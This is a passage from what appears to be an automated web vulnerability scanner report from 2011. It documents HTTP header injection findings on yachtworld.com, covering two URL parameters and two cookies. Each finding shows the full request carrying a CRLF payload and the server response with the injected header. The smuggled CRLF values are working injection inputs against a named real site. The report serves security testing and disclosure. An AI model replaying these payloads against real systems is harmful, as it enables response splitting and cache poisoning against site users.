VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:29 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d
&units=Feet&id=2267335&lang=en&slim=pp279757&
Content-Length: 176
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d&units=Feet&id=2267335&lang=en&slim=pp279757&">here</a>

2.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload d9915%0d%0a0e475e20fcd was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=d9915%0d%0a0e475e20fcd&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:27 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
0e475e20fcd
&
Content-Length: 171
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
0e475e20fcd&">here</a>

2.9. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [units parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload 67044%0d%0a3831b3bd0d0 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=67044%0d%0a3831b3bd0d0&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:40 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0
&id=2267335&lang=en&slim=pp279757&
Content-Length: 175
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=67044
3831b3bd0d0&id=2267335&lang=en&slim=pp279757&">here</a>

2.10. https://www.yachtworld.com/ [savedLabel0 cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.yachtworld.com
Path:   /

Issue detail

The value of the savedLabel0 cookie is copied into the Set-Cookie response header. The payload ab4ad%0d%0a2d954fcf23f was submitted in the savedLabel0 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=ab4ad%0d%0a2d954fcf23f; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:22 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=ab4ad
2d954fcf23f
; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=24-32%20ft,regulator,    Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:22 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>



...[SNIP]...

2.11. https://www.yachtworld.com/ [savedLabel1 cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.yachtworld.com
Path:   /

Issue detail

The value of the savedLabel1 cookie is copied into the Set-Cookie response header. The payload 278e2%0d%0a3167851441c was submitted in the savedLabel1 cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=278e2%0d%0a3167851441c; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:24 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
